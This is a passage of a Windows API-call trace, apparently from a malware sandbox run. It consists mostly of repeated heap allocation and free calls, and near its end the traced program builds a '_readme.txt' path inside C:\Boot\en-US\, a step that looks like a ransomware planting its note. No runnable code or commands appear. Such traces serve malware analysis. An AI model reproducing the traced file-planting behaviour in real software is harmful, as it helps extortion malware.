Size=0x820) returned 0x9c5d1d0 [0056.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.150] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.150] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.150] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.150] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.150] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.150] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.150] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.150] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.150] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.150] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.150] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.150] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.150] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.150] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.150] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.150] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.150] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.150] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.150] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.150] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.150] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.150] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.150] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.150] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.150] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.150] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.150] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.150] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.150] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.150] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.150] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.151] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.151] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.151] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.151] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.151] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.151] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.151] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.151] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.151] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.151] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.151] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.151] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.151] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.151] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.151] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.151] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.151] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.151] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.151] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.151] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.151] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.151] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.151] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.151] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.151] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.151] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.151] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.151] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.151] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.151] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.151] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.151] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.152] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.152] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.152] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.152] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.152] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.152] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.152] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.152] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.152] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.152] PathFindFileNameW (pszPath="C:\\Boot\\en-US\\") returned="en-US\\" [0056.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.152] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0056.152] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.152] PathFindFileNameW (pszPath="") returned="" [0056.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.152] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0056.153] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0056.153] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x800) returned 0x3297a68 [0056.153] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3297a68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0056.153] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5d1d0 [0056.153] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.153] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0056.153] PathAppendW (in: pszPath="C:\\Boot\\en-US\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\en-US\\_readme.txt") returned 1 [0056.153] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.153] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.153] PathFileExistsW 